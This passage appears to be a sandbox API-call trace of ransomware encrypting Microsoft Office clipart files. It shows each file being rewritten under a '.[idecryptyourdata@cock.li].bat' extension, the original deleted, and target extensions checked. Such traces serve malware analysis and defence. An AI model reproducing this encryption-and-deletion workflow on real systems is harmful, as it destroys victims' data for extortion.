lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0063.959] SetEndOfFile (hFile=0x384) returned 1 [0063.962] CloseHandle (hObject=0x384) returned 1 [0063.964] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.964] SetEndOfFile (hFile=0x350) returned 1 [0063.967] CloseHandle (hObject=0x350) returned 1 [0063.967] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00985_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0063.967] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00985_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00985_.wmf")) returned 1 [0063.967] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00985_.WMF") returned 68 [0063.967] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00985_.WMF") returned 68 [0063.967] lstrlenW (lpString=".doc") returned 4 [0063.967] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0063.967] lstrlenW (lpString=".docx") returned 5 [0063.967] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0063.967] lstrlenW (lpString=".pdf") returned 4 [0063.967] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0063.968] lstrlenW (lpString=".xls") returned 4 [0063.968] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0063.968] lstrlenW (lpString=".xlsx") returned 5 [0063.968] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0063.968] lstrlenW (lpString=".ppt") returned 4 [0063.968] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0063.968] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00985_.WMF") returned 68 [0063.968] lstrlenW (lpString=".zip") returned 4 [0063.968] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0063.968] lstrlenW (lpString=".rar") returned 4 [0063.968] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0063.968] lstrlenW (lpString=".bz2") returned 4 [0063.968] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0063.968] lstrlenW (lpString=".7z") returned 3 [0063.968] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0063.968] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00985_.WMF") returned 68 [0063.968] lstrlenW (lpString=".dbf") returned 4 [0063.968] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0063.968] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00985_.WMF") returned 68 [0063.968] lstrlenW (lpString=".1cd") returned 4 [0063.968] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0063.968] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00985_.WMF") returned 68 [0063.968] lstrlenW (lpString=".jpg") returned 4 [0063.968] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0063.968] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.969] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.969] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00076_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00076_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0063.969] GetLastError () returned 0x0 [0063.969] ReadFile (in: hFile=0x350, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x532, lpOverlapped=0x0) returned 1 [0063.985] WriteFile (in: hFile=0x370, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x540, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x540, lpOverlapped=0x0) returned 1 [0063.986] ReadFile (in: hFile=0x350, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0063.986] WriteFile (in: hFile=0x370, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0063.986] SetEndOfFile (hFile=0x370) returned 1 [0063.986] CloseHandle (hObject=0x370) returned 1 [0063.987] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.987] SetEndOfFile (hFile=0x350) returned 1 [0063.988] CloseHandle (hObject=0x350) returned 1 [0063.988] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00076_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0063.988] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00076_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00076_.wmf")) returned 1 [0064.017] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00076_.WMF") returned 68 [0064.017] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00076_.WMF") returned 68 [0064.017] lstrlenW (lpString=".doc") returned 4 [0064.017] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0064.017] lstrlenW (lpString=".docx") returned 5 [0064.018] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0064.018] lstrlenW (lpString=".pdf") returned 4 [0064.018] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0064.018] lstrlenW (lpString=".xls") returned 4 [0064.018] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0064.018] lstrlenW (lpString=".xlsx") returned 5 [0064.018] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0064.018] lstrlenW (lpString=".ppt") returned 4 [0064.018] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0064.018] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00076_.WMF") returned 68 [0064.018] lstrlenW (lpString=".zip") returned 4 [0064.018] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0064.018] lstrlenW (lpString=".rar") returned 4 [0064.018] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0064.018] lstrlenW (lpString=".bz2") returned 4 [0064.018] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0064.018] lstrlenW (lpString=".7z") returned 3 [0064.018] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0064.018] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00076_.WMF") returned 68 [0064.018] lstrlenW (lpString=".dbf") returned 4 [0064.018] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0064.018] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00076_.WMF") returned 68 [0064.018] lstrlenW (lpString=".1cd") returned 4 [0064.018] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0064.018] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00076_.WMF") returned 68 [0064.018] lstrlenW (lpString=".jpg") returned 4 [0064.018] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0064.036] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.036] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.036] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00092_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00092_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0064.036] GetLastError () returned 0x0 [0064.036] ReadFile (in: hFile=0x2c8, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x1f26, lpOverlapped=0x0) returned 1 [0064.051] WriteFile (in: hFile=0x358, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x1f30, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x1f30, lpOverlapped=0x0) returned 1 [0064.051] ReadFile (in: hFile=0x2c8, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0064.051] WriteFile (in: hFile=0x358, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0064.052] SetEndOfFile (hFile=0x358) returned 1 [0064.052] CloseHandle (hObject=0x358) returned 1 [0064.058] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.058] SetEndOfFile (hFile=0x2c8) returned 1 [0064.059] CloseHandle (hObject=0x2c8) returned 1 [0064.059] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00092_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0064.060] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00092_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00092_.wmf")) returned 1 [0064.060] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00092_.WMF") returned 68 [0064.060] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00092_.WMF") returned 68 [0064.060] lstrlenW (lpString=".doc") returned 4 [0064.060] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0064.060] lstrlenW (lpString=".docx") returned 5 [0064.060] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0064.060] lstrlenW (lpString=".pdf") returned 4 [0064.060] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0064.060] lstrlenW (lpString=".xls") returned 4 [0064.060] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0064.060] lstrlenW (lpString=".xlsx") returned 5 [0064.060] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0064.060] lstrlenW (lpString=".ppt") returned 4 [0064.060] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0064.060] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00092_.WMF") returned 68 [0064.060] lstrlenW (lpString=".zip") returned 4 [0064.060] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0064.060] lstrlenW (lpString=".rar") returned 4 [0064.060] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0064.060] lstrlenW (lpString=".bz2") returned 4 [0064.060] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0064.060] lstrlenW (lpString=".7z") returned 3 [0064.060] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0064.060] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00092_.WMF") returned 68 [0064.060] lstrlenW (lpString=".dbf") returned 4 [0064.060] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0064.061] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00092_.WMF") returned 68 [0064.061] lstrlenW (lpString=".1cd") returned 4 [0064.061] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0064.061] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00092_.WMF") returned 68 [0064.061] lstrlenW (lpString=".jpg") returned 4 [0064.061] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0064.061] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.061] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.061] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00145_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00145_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0064.061] GetLastError () returned 0x0 [0064.061] ReadFile (in: hFile=0x2c8, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x6b0, lpOverlapped=0x0) returned 1 [0064.081] WriteFile (in: hFile=0x358, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x6c0, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x6c0, lpOverlapped=0x0) returned 1 [0064.082] ReadFile (in: hFile=0x2c8, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0064.082] WriteFile (in: hFile=0x358, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0064.082] SetEndOfFile (hFile=0x358) returned 1 [0064.097] CloseHandle (hObject=0x358) returned 1 [0064.098] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.098] SetEndOfFile (hFile=0x2c8) returned 1 [0064.101] CloseHandle (hObject=0x2c8) returned 1 [0064.101] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00145_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0064.101] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00145_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00145_.wmf")) returned 1 [0064.102] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00145_.WMF") returned 68 [0064.102] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00145_.WMF") returned 68 [0064.102] lstrlenW (lpString=".doc") returned 4 [0064.102] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0064.102] lstrlenW (lpString=".docx") returned 5 [0064.102] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0064.102] lstrlenW (lpString=".pdf") returned 4 [0064.102] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0064.102] lstrlenW (lpString=".xls") returned 4 [0064.102] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0064.102] lstrlenW (lpString=".xlsx") returned 5 [0064.102] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0064.102] lstrlenW (lpString=".ppt") returned 4 [0064.102] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0064.102] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00145_.WMF") returned 68 [0064.102] lstrlenW (lpString=".zip") returned 4 [0064.102] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0064.102] lstrlenW (lpString=".rar") returned 4 [0064.102] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0064.102] lstrlenW (lpString=".bz2") returned 4 [0064.102] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0064.102] lstrlenW (lpString=".7z") returned 3 [0064.102] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0064.102] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00145_.WMF") returned 68 [0064.102] lstrlenW (lpString=".dbf") returned 4 [0064.102] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0064.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00145_.WMF") returned 68 [0064.103] lstrlenW (lpString=".1cd") returned 4 [0064.103] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0064.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00145_.WMF") returned 68 [0064.103] lstrlenW (lpString=".jpg") returned 4 [0064.103] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0064.103] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.103] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.103] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00200_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00200_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0064.103] GetLastError () returned 0x0 [0064.103] ReadFile (in: hFile=0x2c8, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0xc20, lpOverlapped=0x0) returned 1 [0064.115] WriteFile (in: hFile=0x344, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xc30, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xc30, lpOverlapped=0x0) returned 1 [0064.116] ReadFile (in: hFile=0x2c8, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0064.116] WriteFile (in: hFile=0x344, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0064.116] SetEndOfFile (hFile=0x344) returned 1 [0064.117] CloseHandle (hObject=0x344) returned 1 [0064.117] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.117] SetEndOfFile (hFile=0x2c8) returned 1 [0064.118] CloseHandle (hObject=0x2c8) returned 1 [0064.118] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00200_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0064.118] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00200_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00200_.wmf")) returned 1 [0064.119] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00200_.WMF") returned 68 [0064.119] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00200_.WMF") returned 68 [0064.119] lstrlenW (lpString=".doc") returned 4 [0064.119] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0064.119] lstrlenW (lpString=".docx") returned 5 [0064.119] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0064.119] lstrlenW (lpString=".pdf") returned 4 [0064.119] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0064.119] lstrlenW (lpString=".xls") returned 4 [0064.119] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0064.119] lstrlenW (lpString=".xlsx") returned 5 [0064.119] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0064.119] lstrlenW (lpString=".ppt") returned 4 [0064.119] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0064.119] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00200_.WMF") returned 68 [0064.119] lstrlenW (lpString=".zip") returned 4 [0064.119] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0064.119] lstrlenW (lpString=".rar") returned 4 [0064.119] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0064.119] lstrlenW (lpString=".bz2") returned 4 [0064.119] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0064.119] lstrlenW (lpString=".7z") returned 3 [0064.119] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0064.119] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00200_.WMF") returned 68 [0064.119] lstrlenW (lpString=".dbf") returned 4 [0064.119] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0064.119] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00200_.WMF") returned 68 [0064.120] lstrlenW (lpString=".1cd") returned 4 [0064.120] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0064.120] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00200_.WMF") returned 68 [0064.120] lstrlenW (lpString=".jpg") returned 4 [0064.120] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0064.126] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.126] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.126] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00439_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00439_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0064.130] GetLastError () returned 0x0 [0064.130] ReadFile (in: hFile=0x340, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x804, lpOverlapped=0x0) returned 1 [0064.132] WriteFile (in: hFile=0x384, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x810, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x810, lpOverlapped=0x0) returned 1 [0064.133] ReadFile (in: hFile=0x340, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0064.133] WriteFile (in: hFile=0x384, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0064.133] SetEndOfFile (hFile=0x384) returned 1 [0064.135] CloseHandle (hObject=0x384) returned 1 [0064.136] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.136] SetEndOfFile (hFile=0x340) returned 1 [0064.137] CloseHandle (hObject=0x340) returned 1 [0064.137] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00439_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0064.137] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00439_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00439_.wmf")) returned 1 [0064.139] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00439_.WMF") returned 68 [0064.139] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00439_.WMF") returned 68 [0064.139] lstrlenW (lpString=".doc") returned 4 [0064.139] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0064.139] lstrlenW (lpString=".docx") returned 5 [0064.139] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0064.139] lstrlenW (lpString=".pdf") returned 4 [0064.139] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0064.139] lstrlenW (lpString=".xls") returned 4 [0064.139] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0064.139] lstrlenW (lpString=".xlsx") returned 5 [0064.139] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0064.140] lstrlenW (lpString=".ppt") returned 4 [0064.140] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0064.140] lstrlenW (lpString="C:\\Program Files\\Microsoft 